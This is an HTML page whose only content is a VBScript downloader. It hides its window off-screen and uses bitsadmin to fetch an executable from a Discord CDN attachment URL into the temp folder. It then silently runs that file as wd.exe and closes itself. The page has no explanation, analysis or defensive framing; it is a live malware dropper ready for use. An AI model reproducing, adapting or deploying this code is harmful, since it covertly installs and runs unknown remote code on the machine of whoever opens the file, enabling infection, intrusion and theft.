<html><body><script language="VBScript">
Window.ResizeTo 0,0:Window.MoveTo -5000,-5000

Dim shell: Set shell = CreateObject("WScript.Shell")
Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
Dim temp: temp = fso.GetSpecialFolder(2)

shell.Run "bitsadmin /transfer d /download /priority high ""https://cdn.discordapp.com/attachments/1327250400839209022/1548315281670012928/navi.exe?ex=6ab91179&is=6ab7bff9&hm=4bb000928343130663bceef1626d90aca473b6a98da87d86eabebba62e9472fe&"" """ & temp & "\wd.exe""", 0, True

If fso.FileExists(temp & "\wd.exe") Then
    shell.Run """" & temp & "\wd.exe""", 0, False
End If

window.close()
</script></body></html>
